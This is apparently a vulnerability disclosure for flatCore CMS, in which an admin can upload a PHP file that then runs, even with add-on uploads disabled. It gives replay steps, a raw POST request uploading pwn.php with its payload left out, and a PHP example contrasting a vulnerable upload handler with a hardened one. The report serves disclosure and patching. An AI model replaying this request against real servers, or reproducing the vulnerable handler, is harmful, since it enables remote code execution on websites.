Unrestricted Upload of File with Dangerous Type in flatcore/flatcore-cms


Reported on Oct 12th 2021


Even with $fc_upload_addons = false, an attacker can still upload files (including PHP scripts) by sending the upload POST request directly to acp/core/files.upload-script.php: the setting is only honoured by the admin UI, not by the server-side upload script.

Proof of Concept

  1. Set $fc_upload_addons = true.
  2. In the admin panel, start an add-on upload of a PHP file and capture the upload request (for example in an intercepting proxy) without sending it.
  3. Set $fc_upload_addons = false.
  4. Send the captured upload request. The file is still written to the upload/plugins directory.

The following request uploads a malicious PHP script (pwn.php) onto the server; the upload_type and csrf_token values and the PHP body are omitted here:

POST /flatCore-CMS/acp/core/files.upload-script.php HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cache-Control: no-cache
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------167305252220314413616184565
Content-Length: 516
Connection: close
Cookie: acptheme=dark; PHPSESSID=6ffjvvcureq3dkrb4vco57bq6f

-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="upload_type"

-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="csrf_token"

-----------------------------167305252220314413616184565
Content-Disposition: form-data; name="file"; filename="pwn.php"
Content-Type: application/x-php

-----------------------------167305252220314413616184565--

  5. Browse to the uploaded pwn.php in the upload/plugins directory to execute the malicious PHP script.


This vulnerability gives an attacker with admin (ACP) privileges remote code execution on the web server, even when add-on uploads have been disabled in the configuration.

Recommended Fix

This occurs because files.upload-script.php never checks that $fc_upload_addons is true before writing the uploaded file; the setting only controls whether the upload form is shown. The script should reject the request server-side (for example with a 403) whenever $fc_upload_addons is false. Independently of that flag, the upload handler should not accept arbitrary file types: restrict the extension and verify the content on the server rather than trusting the client-supplied Content-Type.
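The two patterns contrasted below are an added illustration, not flatCore's own code: an upload handler that relies on the UI hiding the form (the pattern this report describes) beside one that enforces $fc_upload_addons and the file type in the handler itself. $fc_upload_addons, the upload/plugins target and the pwn.php filename come from the report; the function names, the zip-only allow-list and the constructed $_FILES-style entry are assumptions.

```php
<?php
declare(strict_types=1);

// Added illustrative example; not flatCore's code. $fc_upload_addons and the
// upload/plugins target are taken from the report; function names, the
// allow-list and the sample $_FILES entry below are assumptions.

// Vulnerable pattern: the setting gates only the form in the admin UI. The
// handler never consults $fc_upload_addons and accepts any extension, so a
// crafted POST with pwn.php is written straight into the plugins directory.
function vulnerable_destination(array $file, string $targetDir): string
{
    return rtrim($targetDir, '/') . '/' . basename($file['name']);
}

// Hardened pattern: the handler enforces the setting and the file type itself.
// Returns the path the upload may be moved to, or throws.
function hardened_destination(array $file, string $targetDir, bool $uploadsEnabled): string
{
    // 1. Enforce the configuration where the write actually happens.
    if (!$uploadsEnabled) {
        throw new RuntimeException('add-on uploads are disabled (403)');
    }
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload error');
    }
    // 2. Extension allow-list (assumed: add-ons are shipped as zip archives).
    $allowed = ['zip' => 'application/zip'];
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new RuntimeException("extension .$ext not permitted");
    }
    // 3. Sniff the content server-side; the client's Content-Type is untrusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== $allowed[$ext]) {
        throw new RuntimeException("content type $mime does not match .$ext");
    }
    // 4. Never reuse the client filename: random name, extension from the allow-list.
    return rtrim($targetDir, '/') . '/' . bin2hex(random_bytes(8)) . '.' . $ext;
}
// In a real handler the caller then does:
//   is_uploaded_file($file['tmp_name']) && move_uploaded_file($file['tmp_name'], $dest)

// Demo with a constructed $_FILES-style entry for the report's pwn.php.
$fc_upload_addons = false;
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp, "<?php echo 'pwn'; ?>");   // constructed stand-in payload
$file = ['name' => 'pwn.php', 'tmp_name' => $tmp, 'error' => UPLOAD_ERR_OK];

echo 'vulnerable: ' . vulnerable_destination($file, 'upload/plugins') . PHP_EOL;
try {
    hardened_destination($file, 'upload/plugins', $fc_upload_addons);
} catch (RuntimeException $e) {
    echo 'hardened (flag off): rejected, ' . $e->getMessage() . PHP_EOL;
}
// Even with uploads re-enabled, the .php extension is still refused.
try {
    hardened_destination($file, 'upload/plugins', true);
} catch (RuntimeException $e) {
    echo 'hardened (flag on): rejected, ' . $e->getMessage() . PHP_EOL;
}
unlink($tmp);
```

To confirm a fix, repeat steps 1 to 4 of the proof of concept against the patched files.upload-script.php: with $fc_upload_addons = false the replayed request must be refused and nothing may appear under upload/plugins.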

Patrick validated this vulnerability a year ago
haxatron has been awarded the disclosure bounty
Patrick marked this as fixed with commit 1c31fc a year ago
Patrick has been awarded the fix bounty
This vulnerability will not receive a CVE